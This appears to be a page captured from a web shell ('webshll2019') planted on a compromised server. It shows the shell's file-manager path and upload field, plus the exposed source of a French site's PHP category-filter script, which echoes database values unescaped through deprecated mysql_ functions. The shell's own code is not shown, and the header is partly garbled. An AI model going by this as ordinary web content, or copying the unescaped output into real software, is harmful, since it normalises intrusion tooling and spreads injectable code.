?

áEÓê¤ÎïLwebshll2019

Current Path : /home/webyoo/www/backup/allback/kanity.com/save0807bh/
Upload File :
Current File : /home/webyoo/www/backup/allback/kanity.com/save0807bh/filtre_categ.php

<ul class="optionset" data-option-key="filter">
<li class="selected"><a href="#filter" data-option-value="*">Toutes categories</a></li>
<?php
		include "start.php";

        $query = mysql_query("SELECT * FROM kan_categories ORDER BY nom_complet ASC");
		
		while($row = mysql_fetch_array($query)) {
			echo '<li><a data-option-value=".'.$row['libelle'].'" href="#filter" title="Voir tous les posts de la catégorie '.$row['libelle'].'">'.$row['nom_complet'].'</a></li>';
		}

?>
    	
</ul>



web shell, Coded By 2019